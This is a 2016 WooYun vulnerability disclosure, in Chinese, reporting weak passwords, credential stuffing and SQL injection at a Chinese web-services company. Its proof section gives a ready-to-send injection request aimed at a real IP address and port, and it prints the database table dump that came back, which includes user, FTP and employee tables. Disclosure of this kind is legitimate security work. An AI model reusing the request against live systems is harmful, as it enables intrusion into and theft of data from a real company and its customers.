当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0170368

漏洞标题:中企动力漏洞礼包(弱口令/撞库/sql注入/泄露公司内部信息)

相关厂商:中企动力科技股份有限公司

漏洞作者: 路人甲

提交时间:2016-01-17 10:09

修复时间:2016-02-27 11:49

公开时间:2016-02-27 11:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-17: 细节已通知厂商并且等待厂商处理中
2016-01-17: 厂商已经确认,细节仅向厂商公开
2016-01-27: 细节向核心白帽子及相关领域专家公开
2016-02-06: 细节向普通白帽子公开
2016-02-16: 细节向实习白帽子公开
2016-02-27: 细节向公众公开

简要描述:

多处漏洞
影响挺大的!
来个首页吧!

详细说明:

121.14.6.93:8001
可撞库

z.png


内部信息,部分截图

x.png


c.png


漏洞证明:

sql注射

GET /ttvieworderinfo.asp?tietongid=735* HTTP/1.1
Host: 121.14.6.93:8001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://121.14.6.93:8001/ttsubcompanylist.asp?left=1
Cookie: ASPSESSIONIDACCDSQCD=FDKJNKOAADDFIMJMNMEOPBLL
Connection: keep-alive


v.png


Database: domainlogin1_22
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| dbo.WebServiceCodeMapping | 1424750 |
| dbo.parse8 | 694813 |
| dbo.CN_CompanyInfo_old | 498924 |
| dbo.parse | 447581 |
| dbo.Domain_State | 427731 |
| dbo.CompanyInfo_old | 311783 |
| dbo.Domain_Register_Old | 279203 |
| dbo.parse1 | 219641 |
| dbo.parse7 | 138105 |
| dbo.v_Parse7_TJ2 | 138105 |
| dbo.Domain_Continue_old | 122246 |
| dbo.CN_CompanyInfo | 113146 |
| dbo.CompanyInfo | 113144 |
| dbo.InterfaceLog | 103271 |
| dbo.parse10 | 92513 |
| dbo.parse2 | 87590 |
| dbo.Domain_Register | 55964 |
| dbo.parse9 | 55173 |
| dbo.domain_rele | 51404 |
| dbo.ddtable_old | 49642 |
| dbo.mission | 48865 |
| dbo.Domain_Continue | 43773 |
| dbo.ddtable | 35698 |
| dbo.agroupemail | 30730 |
| dbo.parse12 | 30610 |
| dbo.parse4 | 27584 |
| dbo.clientinfo | 21759 |
| dbo.parse12funs | 20979 |
| dbo.TotalDayList | 18401 |
| dbo.SysLog | 16509 |
| dbo.TaskLog | 16483 |
| dbo.domain | 13438 |
| dbo.FTPUserInfo | 12821 |
| dbo.Domain_ShiftInfo_old | 11991 |
| dbo.parse3 | 11965 |
| dbo.LDAPOperationLog | 11811 |
| dbo.cftpuserinfo | 11686 |
| dbo.parse13 | 10495 |
| dbo.DomainLogin_ZMailData | 10343 |
| dbo.v_emaillist | 10279 |
| dbo.cgroupemail | 9695 |
| dbo.CSLV_ContractLastTime | 9593 |
| dbo.Cdatabase | 7474 |
| dbo.MYCE_EmployeeInfo | 7014 |
| dbo.cbyname | 6444 |
| dbo.TitongOperationLog | 3709 |
| dbo.login_usr | 2664 |
| dbo.cftpuserinfo_old | 2275 |
| dbo.Domain_ShiftInfo | 2200 |
| dbo.byname | 2036 |
| dbo.parse15 | 1874 |
| dbo.parse5 | 1496 |
| dbo.ModifLog | 1411 |
| dbo.IVRPhoneRouter | 1217 |
| dbo.TotalAreaDayList | 1200 |
| dbo.Tietong4007Log | 1184 |
| dbo.tempsheet | 1106 |
| dbo.agroupemailfuns | 997 |
| dbo.Tietong | 834 |
| dbo.v_Tietong | 834 |
| dbo.TotalMonthList | 669 |
| dbo.Adatabase | 584 |
| dbo.ccomemail | 584 |
| dbo.UserLog | 556 |
| dbo.[Tietong&I2SSRelation] | 476 |
| dbo.parse17 | 455 |
| dbo.PhoneRouter | 445 |
| dbo.IVR_AutoVoice | 410 |
| dbo.IVR | 389 |
| dbo.TietongIncrementFun | 389 |
| dbo.Users_acc | 372 |
| dbo.TietongYunYingLog | 332 |
| dbo.parse14 | 327 |
| dbo.ProductTypeMIS2ProductMapping | 282 |
| dbo.Users | 221 |
| dbo.parse11 | 204 |
| dbo.fgstable_old | 201 |
| dbo.acomemail | 113 |
| dbo.subCompany | 108 |
| dbo.[Renew&AddNewRelation] | 99 |
| dbo.CompanyComparison | 96 |
| dbo.login_usr1111 | 96 |
| dbo.IPTable | 75 |
| dbo.ZJAreaSubCompany | 73 |
| dbo.fgstable | 70 |
| dbo.tem_inputTable | 62 |
| dbo.TotalAreaMonthList | 40 |
| dbo.parse6 | 36 |
| dbo.t_modalinfo | 27 |
| dbo.Industry | 26 |
| dbo.pbcatedt | 21 |
| dbo.pbcatfmt | 20 |
| dbo.MailBoxFuns | 18 |
| dbo.parse20 | 13 |
| dbo.ProductType | 13 |
| dbo.Tietong4007NoRank | 13 |
| dbo.Tietong4007NoRankAmount | 13 |
| dbo.DictionaryStatus | 11 |
| dbo.Lanuage | 11 |
| dbo.parse16 | 9 |
| dbo.ZQT_Status | 7 |
| dbo.area | 5 |
| dbo.AreaInfo | 4 |
| dbo.BuinessType | 4 |
| dbo.setTotal | 4 |
| dbo.ZQT_ProductType | 4 |
| dbo.myuser | 3 |
| dbo.t_productinfo | 3 |
| dbo.ZQT_BusinessType | 3 |
| dbo.changedomain | 2 |
| dbo.ModifUsr | 2 |
| dbo.address | 1 |
| dbo.crm | 1 |
| dbo.DictionaryIncrementFun | 1 |
| dbo.LHMtable | 1 |
| dbo.parse18 | 1 |
| dbo.TradeEdition | 1 |
| dbo.v_ZQT | 1 |
| dbo.ZQT | 1 |
+-----------------------------------+---------+

修复方案:

你们懂的

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-01-17 13:19

厂商回复:

正在处理

最新状态:

暂无


漏洞评价:

评价